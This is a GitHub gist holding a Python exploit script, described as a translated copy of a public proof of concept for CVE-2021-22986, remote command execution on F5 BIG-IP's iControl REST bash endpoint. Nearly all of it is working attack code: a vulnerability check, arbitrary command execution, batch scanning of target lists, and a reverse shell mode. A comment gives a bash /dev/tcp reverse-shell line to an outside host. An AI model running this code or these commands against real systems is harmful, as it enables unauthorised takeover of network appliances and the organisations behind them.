Created
September 28, 2021 17:04
-
-
Save JoyGhoshs/1221cab463f2eb5d2581f46143357857 to your computer and use it in GitHub Desktop.
translated version of https://github.com/Al1ex/CVE-2021-22986
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import sys | |
| import argparse | |
| import re | |
| import json | |
| import time | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| t = int(time.time()) | |
| def title(): | |
| print(''' | |
| ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ | |
| / |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / / | |
| | ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ | |
| | | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \ | |
| | `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | | |
| \______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/ | |
| Author:Al1ex@Heptagram | |
| Github:https://github.com/Al1ex | |
| ''') | |
| print(''' | |
| Authentication mode: python CVE_2021_22986.py -v true -u target_url | |
| Attack mode: python CVE_2021_22986.py -a true -u target_url -c command | |
| Batch detection: python CVE_2021_22986.py -s true -f file | |
| Rebound mode: python CVE_2021_22986.py -r true -u target_url -c command | |
| ''') | |
| def check(target_url): | |
| check_url = target_url + '/mgmt/tm/util/bash' | |
| headers = { | |
| "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", | |
| 'Content-Type': 'application/json', | |
| 'X-F5-Auth-Token': '', | |
| 'Authorization': 'Basic YWRtaW46QVNhc1M=' | |
| } | |
| data = {'command': "run",'utilCmdArgs':"-c id"} | |
| try: | |
| response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5) | |
| if response.status_code == 200 and 'commandResult' in response.text: | |
| print("[+] Target {} Is Vulnerable".format(target_url)) | |
| else: | |
| print("[-] Target {} Not Vulnerable".format(target_url)) | |
| except Exception as e: | |
| print('[x] Url Access exception {0}'.format(target_url)) | |
| def attack(target_url,cmd): | |
| attack_url = target_url + '/mgmt/tm/util/bash' | |
| headers = { | |
| "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", | |
| 'Content-Type': 'application/json', | |
| 'X-F5-Auth-Token': '', | |
| 'Authorization': 'Basic YWRtaW46QVNhc1M=' | |
| } | |
| data = {'command': "run",'utilCmdArgs':"-c '{0}'".format(cmd)} | |
| try: | |
| response = requests.post(url=attack_url, json=data, headers=headers, verify=False, timeout=5) | |
| if response.status_code == 200 and 'commandResult' in response.text: | |
| default = json.loads(response.text) | |
| display = default['commandResult'] | |
| print("[+] Target {} has a loophole".format(target_url)) | |
| print('[+] The response is: {0}'.format(display)) | |
| else: | |
| print("[-] Target {} has no loopholes".format(target_url)) | |
| except Exception as e: | |
| print('url Access exception {0}'.format(target_url)) | |
| def reverse_shell(target_url,command): | |
| reverse_url = target_url + '/mgmt/tm/util/bash' | |
| headers = { | |
| "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", | |
| 'Content-Type': 'application/json', | |
| 'X-F5-Auth-Token': '', | |
| 'Authorization': 'Basic YWRtaW46QVNhc1M=' | |
| } | |
| data = {'command': "run",'utilCmdArgs':"-c '{0}'".format(command)} | |
| # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1 | |
| try: | |
| requests.post(url=reverse_url, json=data, headers=headers, verify=False, timeout=5) | |
| except Exception as e: | |
| print("[+] Please check to see if you bounce the shell back") | |
| def scan(file): | |
| for url_link in open(file, 'r', encoding='utf-8'): | |
| if url_link.strip() != '': | |
| url_path = format_url(url_link.strip()) | |
| check(url_path) | |
| def format_url(url): | |
| try: | |
| if url[:4] != "http": | |
| url = "https://" + url | |
| url = url.strip() | |
| return url | |
| except Exception as e: | |
| print('URL Error {0}'.format(url)) | |
| def main(): | |
| parser = argparse.ArgumentParser("F5 Big-IP RCE") | |
| parser.add_argument('-v', '--verify', type=bool,help=' Verification mode ') | |
| parser.add_argument('-u', '--url', type=str, help='Target URL ') | |
| parser.add_argument('-a', '--attack', type=bool, help=' Attack mode ') | |
| parser.add_argument('-c', '--command', type=str, default="id", help=' Excuting an order ') | |
| parser.add_argument('-s', '--scan', type=bool, help=' Batch mode ') | |
| parser.add_argument('-f', '--file', type=str, help=' file path ') | |
| parser.add_argument('-r', '--shell', type=bool, help=' Reverse shell mode ') | |
| args = parser.parse_args() | |
| verify_model = args.verify | |
| url = args.url | |
| attack_model = args.attack | |
| command = args.command | |
| scan_model = args.scan | |
| file = args.file | |
| shell_model = args.shell | |
| if verify_model is True and url !=None: | |
| check(url) | |
| elif attack_model is True and url != None and command != None: | |
| attack(url,command) | |
| elif scan_model is True and file != None: | |
| scan(file) | |
| elif shell_model is True and url != None and command != None: | |
| reverse_shell(url,command) | |
| else: | |
| sys.exit(0) | |
| if __name__ == '__main__': | |
| title() | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment